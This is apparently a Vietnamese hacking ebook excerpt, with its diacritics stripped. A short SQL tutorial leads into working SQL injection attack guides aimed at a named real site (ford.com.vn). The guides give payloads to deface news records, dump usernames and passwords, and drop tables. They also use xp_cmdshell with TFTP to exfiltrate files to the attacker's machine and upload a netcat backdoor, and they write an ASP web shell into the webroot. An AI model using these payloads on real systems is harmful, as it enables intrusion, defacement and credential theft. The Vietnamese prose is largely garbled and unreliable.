Kt qu tr v trn i khi khng phi l ci m ta mong i. Ta thm mnh
GROUP BY vo trong cu lnh SQL:

GROUP BY Company

v kt qu tr v ln ny s l:

Company SUM(Amount)
W3Schools 12600
IBM 4500

Kt qu ny ng l ci m ta mong mun.

HAVING...

Mnh HAVING...c thm vo SQL v mnh WHERE khng p dng c i
vi cc hm tp hp (nh SUM). Nu khng c HAVING, ta khng th no kim tra
c iu kin vi cc hm tp hp.

C php ca HAVING nh sau:

SELECT tn_ct, SUM(tn_ct) FROM tn_bng
GROUP BY tn_ct
HAVING SUM(tn_ct) iu_kin gi_tr

Ta s dng li bng Sales trn. Cu lnh SQL sau:

GROUP BY Company
HAVING SUM(Amount) > 10000

s tr v kt qu:

Company SUM(Amount)
W3Schools 12600
B danh

Vi SQL, b danh c th c s dng cho tn ca ct v tn ca bng.

B danh ct:

C php b danh ct nh sau:

SELECT tn_ct AS b_danh_ct FROM tn_bng

B danh bng:

B danh bng c c php nh sau:

SELECT tn_ct FROM tn_bng AS b_danh_bng

V d s dng b danh ct:

Ta c bng Persons nh sau:


Cu lnh SQL sau:

SELECT LastName AS H, FirstName AS Tn
FROM Persons

S tr v kt qu:

H Tn
Hansen Ola
Svendson Tove
Pettersen Kari

DeFace bng SQL injection, C bn
(by sinhcv)
FOR NEWBIE
Hihi em xin tip tc,bi ny vn l c bn cho newbie,cn cao siu hn th em chu. y
em xin mn php ly thng Ford ra lm victim.Mc ch ca bi ny l s dng cc cu
lnh update,insert ,drop,delete... trong SQL deFace.
To 1 file c ni dung nh sau:

<body>
<form method="post"
action="https://www.ford.com.vn/Tuyendung/Jobs_Search_Action.asp"
name="frmSearch" onsubmit="return CheckSubmit();">
TIM KIEM <input name="txtSearch" size="40" class="clsText" type="text" size=2>
</br>
DIA DIEM <input type="text" name="SLocation" class="clsText" value="22"></br>
JOB <input type="text" name="SJobCategory" class="clsText" value=""> </br>
<input type=submit value="tim kiem"></br>
</form>
</body>

Save as li thnh file xx.html,sau run nh sau

TIM KIEM: xxx
DIA DIEM: 22
JOB: 1' SQL command --

Trong database ca n c table Fordvn_news vi cc column

MessageId','Status','Priority','Subject','Lead',
'Img','Posted','Edited','Published','FromIp','Body','ReadCount'

Tng ng vi trang news ca n
https://www.ford.com.vn/News/News.asp
y em xin chn ci subject deface vi messageid=146

Roi:
y l cc cu lnh cn bit
Insert into user ("id","pas") values (1,"xxx")-- /*thm 1 user xxx vo table user */
update user set pass="xxxx" where id=1-- /thay i pasword ca thng user c id=1 */
drop table user-- /*nguy him,xa table user */
drop database db-- /*rt nguy him/
delete from user where id=1-- /*xa column */
..............
y em dng update

QUOTE
TIM KIEM: xxx
DIA DIEM: 22
JOB: 1' ;update fordvn_news set subject='TEST' where messageid=146--

Nu bn nhn dc 1 thng bo nh th ny thay v 1 thng bo li SQL th thnh cng ri

QUOTE
Khng tm c theo yu cu ca bn!

OK come on
https://www.ford.com.vn/News/News.asp
Bn cn c th lm dc nhiu th hn ti na,y ch l VD thoai.
Good luck !!!

Hack server b SQL Injection
( Copyright by Windak )
( --Thanks bro Aclatinh and bro MRRO-- )

1)T l thnh cng 80%:
iu kin server phi l winnt v user dng inject l user c quyn dng xp_cmdshell
(sa, dbo)
check bn c th lm sau y trn inject link
[injection link] %2b convert (int,(system_user())
Nu KQ l sa hoc dbo c l bn c th tn cng c ri.
Nu bn c sa hoc dbo nhng m admin li khng cho s dng cmdshell bn hy bt
n ln (bt th no t tm hiu nh )
Lu : bn s ch hack c vo server cha database ca n thi (nhiu khi t
database chung vi host )
Cc tool cn thit : <-- t tm download
tftpd32 , backdoor
+++Mt vi kinh nghim hack, bit lnh DOS v mt cht hiu bit v network
2) Tng bc tip cn
a)Cc khi nim:
Lu : Cch hack ny ca ti khng phi l mt chung nht, bi v cn rt nhiu cch
khc, cch ny ca ti hack thng qua giao thc TFTP.

Ni s v giao thc TFTP :
l mt giao thc truyn file server<->client . N hot ng tng t nh FTP nhng
n gin hn nhiu , thng qua port 69, v mt u im, n khng cn password (y l
iu quan trng ta hack)

Vo DOS g tftp /? -> Bn s c c php ca n nh sau :
TFTP [-i] host PUT || GET filename [v tr file mun gi n]
-i : nu bn cn truyn mt file dng binary hy s dng n
host : IP ca my server
PUT : nu bn mun send file
GET : nu bn mun ly file
V d v mt lnh tftp :
Tftp i xxx.xxx.xxx.xxx PUT netcat.exe C:\nc.exe
S ly file netcat.exe trn my server (my c IP xxx.) v chuyn vo C:\nc.exe trn
my client (my g lnh trn)

By gi ta s test trc tip trn localhost. bn hy m tftpd32 ln bin my mnh thnh
mt server tftp (lu phi tt ht firewall giao thc mi thc hin tt)
Trong tftpd32 c phn BASE directory mc nh l [path to]\tftpd32e, n s l th mc
t cc file up hoc download ca bn khi thc hin trao i file vi client (v bn l
server) (bn c th change nu thch).
Trong bi ny ti dng [link] thay cho link cc bn inject, hy chnh li cho ph hp
run exec (thm (), ( nu cn )
V dng <IP> thay cho Ip ca cc bn (n s hin th khi cc bn bt tftpd32)
Tn cng thc s:
-------------------------------BEGIN----------------------------------
Command1 : RUN COMMAND DOS trn my victim :

[link] exec master..xp_cmdshell [command]

Command 2 : DOWNLOAD FILE t my victim
[link] exec master..xp_cmdshell tftp <IP> PUT [path][filecandown]

V d : Ly Ip my victim :
(1)[link] exec master..xp_cmdshell ipconfig > a.txt
(2)[link] exec master..xp_cmdshell tftp <IP> PUT a.txt
----Gii thch :
(1) : run lnh ny : ipconfig >a.txt <=> to file a.txt vi ni dung l kt qu ca lnh
ipconfig
(2) : run tftp <IP> PUT a.txt <=> chuyn file a.txt vi ni dung va to --> server (my
chng ta )

Command3 : UPLOAD BACKDOOR ln my victim :
[link] exec master..xp_cmdshell tftp [i] <IP> GET backdoor [path muon backdoor c
t]

v d : upload netcat vo C:\WINNT:
[link] exec master..xp_cmdshell tftp i <IP> GET nc.exe C:\WINNT\nx.exe
----------------------------------END------------------------------

3) Kt:
Nh vy chng ta bit cch run command (bn c th run file exe ) , bit down, up
file, hu nh lm ch c server ri y . Cn hack nhanh hay chm, hiu qu bao
nhiu l do bn
( Nu test thy li g xin lin h
http://shacker.computed.net/baivet/nangcao/windak88@yahoo.com )
Chc hack vuiy
vn SQL:
Hack Sql Inject nng cao
Cc bn th xem mt cu truy vn SQL:
select id, forename, surname from authors th 'id','forename' v 'surname' l column ca
table author,khi cu truy vn trn lm vic th n s cho kt qu tt c cc dng trong
table author.Xem cu truy vn sau:
select id, forename, surname from authors where forename = 'john' and surname = 'smith'
y l cu truy vn c iu kin chc khng ni cc bn cng bit,n cho ra kt qu tt
c nhng ai trong csdl vi forename = 'john' and surname = 'smith'

V vy khi vo gi tr u vo khng ng nh trong csdl liu:

Forename: jo'hn
Surname: smith

Cu truy vn tr thnh:
select id, forename, surname from authors where forename = 'jo'hn' and surname = 'smith'
Cu truy vn trn khi c x l th n s pht sinh li:

Server: Msg 170, Level 15, State 1, Line 1
Line 1: Incorrect syntax near 'hn'.

L do l ta lng vo du nhy n "'" v gi tr vo tr thnh 'hn' sai so vi csdl vy s
pht sinh li li dng ci ny attacker c th xo d liu ca bn nh sau:

Forename: jo'; drop table authors--
Table author s b xa ->nguy him phi khng

Nhn vo on code asp sau:y l mt form login

<HTML>
<HEAD>
<TITLE>Login Page</TITLE>
</HEAD>
<BODY bgcolor='000000' text='cccccc'>
<FONT Face='tahoma' color='cccccc'>
<CENTER><H1>Login</H1>
<FORM action='process_login.asp' method=post>
<TABLE>
<TR><TD>Username:</TD><TD><INPUT type=text name=username size=100%

Page 4

width=100></INPUT></TD></TR>
<TR><TD>Password:</TD><TD><INPUT type=password name=password size=100%
width=100></INPUT></TD></TR>
</TABLE>
<INPUT type=submit value='Submit'> <INPUT type=reset value='Reset'>
</FORM>
</FONT>
</BODY>
</HTML>
y l code 'process_login.asp'
<HTML>
<BODY bgcolor='000000' text='ffffff'>
<FONT Face='tahoma' color='ffffff'>
<STYLE>
p { font-size=20pt ! important}
font { font-size=20pt ! important}
h1 { font-size=64pt ! important}
</STYLE>
<%@LANGUAGE = JScript %>
<%
function trace( str )
{
if( Request.form("debug") == "true" )
Response.write( str );
}
function Login( cn )
{
var username;
var password;
username = Request.form("username");
password = Request.form("password");
var rso = Server.CreateObject("ADODB.Recordset");
var sql = "select * from users where username = '" + username + "'
and password = '" + password + "'";
trace( "query: " + sql );
rso.open( sql, cn );
if (rso.EOF)
{
rso.close();
%>
<FONT Face='tahoma' color='cc0000'>
<H1>
<BR><BR>
<CENTER>ACCESS DENIED</CENTER>
</H1>
</BODY>
</HTML>
<%
Response.end
return;
}
else
{
Session("username") = "" + rso("username");
%>
<FONT Face='tahoma' color='00cc00'>
<H1>
<CENTER>ACCESS GRANTED<BR>
<BR>
Welcome,
<% Response.write(rso("Username"));
Response.write( "</BODY></HTML>" );
Response.end
}
}
function Main()
{
//Set up connection
var username
var cn = Server.createobject( "ADODB.Connection" );
cn.connectiontimeout = 20;
cn.open( "localserver", "sa", "password" );
username = new String( Request.form("username") );
if( username.length > 0)
{
Login( cn );
}
cn.close();
}
Main();
%>

y l cu truy vn SQL:

var sql = "select * from users where username = '" + username + "'and password = '" +
password + "'";

nu hacker vo nh sau:

Username: '; drop table users--
Password:

th table 'user; s b xo,v ta c th vt qua bng cch sau:bypass cc bn bit ht ri
ti khng ni li na - ( Bn tham kho li Cn bn hack 1 website b li SQL
Injection )

trng username hacker c th vo nh sau:

Username: ' union select 1, 'fictional_user', 'some_password', 1--

v d table user c to nh sau:

create table users( id int,
username varchar(255),
password varchar(255),
privs int
)

v insert vo:

insert into users values( 0, 'admin', 'r00tr0x!', 0xffff )
insert into users values( 0, 'guest', 'guest', 0x0000 )
insert into users values( 0, 'chris', 'password', 0x00ff )
insert into users values( 0, 'fred', 'sesame', 0x00ff )

Cc hacker s bit c kt qu cc column v table qua cu truy vn having 1=1

Username: ' having 1=1--

Li pht sinh:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.id' is
invalid in the select list because it is not contained in an aggregate
function and there is no GROUP BY clause.
/process_login.asp, line 35

Tip tc ly cc ci cn li:

Username: ' group by users.id having 1=1--
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.username'
is invalid in the select list because it is not contained in either an
aggregate function or the GROUP BY clause.

>> bit c column 'username'

' group by users.id, users.username, users.password, users.privs having 1=1--

Cho n khi khng cn bo li th dng li , vy l bn bit table v column cn khai
thc ri, by gi n i ly gi tr ca n:
xc nh ni dung ca column ta dng hm sum()

Username: ' union select sum(username) from users--
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average
aggregate operation cannot take a varchar data type as an argument.

Gi tr ca username l varchar,khng ni cc bn cng bit l do,cn dng vi id th sao
nh:

Username: ' union select sum(id) from users--
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL
statement containing a UNION operator must have an equal number of
expressions in their target lists.

Vy l ta c th insert vo csdl:
Username: '; insert into users values( 666, 'attacker', 'foobar', 0xffff)--

Ly Version ca server:

Username: ' union select @@version,1,1,1--
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the nvarchar value 'Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug
6 2000 00:57:48 Copyright 1988-2000 Microsoft Corporation Enterprise
Edition on Windows NT 5.0 (Build 2195: Service Pack 2) ' to a column of
data type int.

c th dng convert() nhng ti ch cc bn dng union ,cc bn th c ni dung ca cc
user trogn table nh sau:

Username: ' union select min(username),1,1,1 from users where username > 'a'--

Chn gi tr nh nht ca username v cho n ln hn 'a' -> pht sinh li:

the varchar value 'admin' to a column of data type int.

Vy l ta bit 'admin' acc tn ti,tip tc xem sao:

Username: ' union select min(username),1,1,1 from users where username 'admin'--
the varchar value 'chris' to a column of data type int.

Vy l khi c username -> ly pass:

Username: ' union select password,1,1,1 from users where username ='admin'--
the varchar value 'r00tr0x!' to a column of data type int.

y l k thut m bn c th ly c user mt cch cao cp:

To mt script nh sau:
begin declare @ret varchar(8000)
set @ret=':'
select @ret=@ret+' '+username+'/'+password from users where
username>@ret
select @ret as ret into foo
end

->cu truy vn:

Username: '; begin declare @ret varchar(8000) set @ret=':' select
@ret=@ret+' '+username+'/'+password from users where username>@ret
select @ret as ret into foo end--

To mt table 'foo' vi mt column l 'ret'

Tip tc:

Username: ' union select ret,1,1,1 from foo--
the varchar value ': admin/r00tr0x! guest/guest chris/password
fred/sesame' to a column of data type int.

(Hnh nh mrro dng kiu ny vo VDC)

Xo du vt:

Username: '; drop table foo--

Mt hacker khi iu kin c csdl th h mun xa hn l iu khin h thng mng
ca server lun,mt trong s cch :

1-S dng xp_cmdshell khi c quyn 'sa'
2-S dng xp_regread c register,bao gm SAM
3-Chy link query trn server
4-To script trn server khai thc
5-S dng 'bulk insert' c bt c file no trn h thng
6-S dng bcp to qun cho text file trn server
7-S dng sp_OACreate, sp_OAMethod and sp_OAGetProperty to script (ActiveX)
chy trn server

[xp_cmdshell]

Chc cc bn cng nghe nhiu ri v d:
exec master..xp_cmdshell 'dir'
exec master..xp_cmdshell 'net1 user'

S dng thi hnh cc lnh ca dos vvv.. rt hu hiu

[xp_regread]

Cc hm lin quan...

xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
xp_regwrite

V d:

exec xp_regread HKEY_LOCAL_MACHINE,
'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters','nullsessionshares'

Xc inh null-session share c tn ti trn server

exec xp_regenumvalues
HKEY_LOCAL_MACHINE,'SYSTEM\CurrentControlSet\Services\snmp\parameters\va
lidcommunities'

vv.. cn nhiu th na

[Other Extended Stored Procedures]
services:
exec master..xp_servicecontrol 'start', 'schedule'
exec master..xp_servicecontrol 'start', 'server'

>ng qua cng bit n lm g...

[Importing text files into tables]

S dng 'bulk insert' chn text file vo th mc hin thi,to table n:

create table foo( line varchar(8000) )
tip tc:
bulk insert foo from 'c:\inetpub\wwwroot\process_login.asp'

[Creating Text Files using BCP]

VD:
bcp "SELECT * FROM test..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -
Slocalhost -Usa -Pfoobar
[ActiveX automation scripts in SQL Server]

Dng 'wscript.shell'

vd:

declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'notepad.exe'
Tren cu truy vn:

Username: '; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod
@o, 'run', NULL, 'notepad.exe'--

Dng 'scripting.filesystemobject' c file:
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'opentextfile', @f out, 'c:\boot.ini', 1
exec @ret = sp_oamethod @f, 'readline', @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, 'readline', @line out
end

To script ASP thi hnh command:

declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out,
'c:\inetpub\wwwroot\foo.asp', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,
'<% set o = server.createobject("wscript.shell"): o.run(
request.querystring("cmd") ) %>'
y l nhng cch bn c th dng rt hiu qu,bn hy sng to thm cho mnh t
nhng ch dn c bn ny.

Sql Inject M lnh
Ti bit chc rng cc bn y a s ch bit SQL injection bypass login, hm nay t
xin mn php trnh by nhng k thut m ta c th lm nhiu iu hn l ch vt qua
password ca mt trang b SQL injection.
Lu : a s kin thc ca ti di y ch dng cho server chy MySQL, MSSQL, cn
nhng ci khc th khng chc.... Nu bn cha bit lnh SQL th khng nn c bi ny
m nn tham kho n trc, OKie ??? Ti khng mun thy nhng cu tr li i loi
nh --- "Tui chng hiu g ht ", "Si u th" ,.....

1)Ly tn table v column hin hnh:
Structure :

Login page (or any injection page)::::
username: ' having 1=1--

KQ: -------------------------------
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'VICTIM.ID' is invalid in
the select list because it is not contained in an aggregate function and there is no GROUP
BY clause.
--------------------------------------
----> Ta c c TABLE VICTIM

Tip tc
username: ' group by VICTIM.ID having 1=1--

KQ :---------------------------------
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'VICTIM.Vuser' is invalid
in the select list because it is not contained in either an aggregate function or the GROUP
BY clause.
-------------------------------------------
Vy l ta c column Vuser

2) UNION nh m hiu qu

Vng tha cc bn, ta c th dng n ly c gn nh mi th .
Trc ht ti xin ni s qua ci Structure ca n :

Login page ::::

username : ' Union select [column] from [table] where [column2=...]--
password : everything

Vd: Gi s ta bit 2 column username v password trong table VTABLE cua db
victim l VUSER v VPASS th ta lm nh sau

username : ' Union select VPASS from VTABLE where VUSER='admin'-- (1)

(1) : Trong trng hp ny admin l mt user m bn bit nu khng c th b trng, n
s cho bn user u tin

KQ:-----------------------------
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement
containing a UNION operator must have an equal number of expressions in their target
lists.
---------------------------------

Nu KQ ra nh trn c ngha l bn phi union thm nhiu column na tt c column
ca table VTABLE c Union ht. Structure ca n nh sau:

username : ' Union select VPASS,1,1,1...1,1 from VTABLE where VUSER='admin'-- (1)

Bn hy thm ",1" cho n khi kt qu ra i loi nh

--------------------------------
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the
nvarchar value 'tuibihackroi' to a column of data type int.
--------------------------------

Nh vy Pass ca user 'admin' l 'tuibihackroi'

Vng tha cc bn SQL injection tht th v, v y l iu ta c th lm trong bi vit
hm nay ca ti : Ly sch database ca i phng.

3) Ly ht value ca mt column bit trong mt table bit
B quyt y l Not in Structure ca n nh sau (s dng v d vi column ca bi
trc):
Vi Vuser l admin ta c th ly c cc user khc

-----Login Page ::::::
username: Union select Vuser,1,1,1,1 from Vtable where username not in
(admin)
-------------------------
Vng, sau chng ta s thu c thm mt user na v ch vic chn vo trong Not in (
vd: Not in (admin,hacker,.)) c lm tip tc nh th ta s c ht mi user(d nhin
sau l mi password).

**** ly danh sch tn cc user theo mt quy nh m bn chn , v d chi ly cc
user c cha t admin chng hn ta dng like : cu trc

-----Login Page ::::::
username: Union select Vuser,1,1,1,1 from Vtable where username not in (admin)
like %admin%
-------------------------

4) Ly ht table v column ca ca database:
B quyt chnh l table ny ca database : INFORMATION_SCHEMA.TABLES vi
column TABLE_NAME (cha ton b table) v table :
INFORMATION_SCHEMA.COLUMNS vi column COLUMN_NAME (cha ton b
column)

Cch s dng dng Union:

-----Login page :::::::
username: UNION SELECT TABLE_NAME,1,1,1,1 FROM
INFORMATION_SCHEMA.TABLES WHERE .
---------------------------

Nh vy ta c th ly c ht table, sau khi c table ta ly ht column ca table :

-----Login page :::::::
username: UNION SELECT COLUMN_NAME FROM
INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME= and
---------------------------

Trn y l nhng iu cn bn nht v SQl injection m ti c th cung cp cho cc bn,
cn lm c tt hay khng th phi c mt cht sng to na hy vng n gip ch cho
cc bn mt cht khi gp mt site b SQl injection

5) Khng cn UNION:
Nu cc bn ngi dng Union v nhng bt tin ca n th cc bn c th dng "Convert"
mt cch d dng hn thu thp info qua cc thng bo li

Structure :

---login page::::

user : ' + convert (int,(select @@version))--
-------------------------

Trn l mt v d bn ly version, gi y mun ly bt c info no bn ch cn thay
vo ci "select @@version" nhng nh nu l ln u tin get info th thm TOP 1 vo
nh

vd: user : ' + convert (int,(select Vpass from Vtable where Vuser='admin'))--

Lu : Nu cc bn s dng khng c th c th v du + khng c chp nhn, lc
hy thay n === %2b

vd: user : ' %2b convert (int,(select Vpass from Vtable where Vuser='admin'))--

6) Run command SQL :

run command bn c th dng du ";"

Structure :

login page :::::
user :' ; [command]--
-----------------------------

vd: '; DROP TABLE VTABLE--
Nu cc bn rnh v SQL th c th lm c rt nhiu iu th v qua ci ny , nhng t
xin phn cho cc bn t nghin cu nh.

Chm ht cun Ebook. Chc cc bn may mn. Hack ch l hc hi v
trao di k nng bo mt.
http://thegioiebook.com

Ebook Hacking Credit Card Version 2

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Ebook Hacking Credit Card Version 2

Uploaded by

Copyright:

Available Formats

------+++-----

Ebook Hacking Credit Card Version 2 Lastest And The End.

You might also like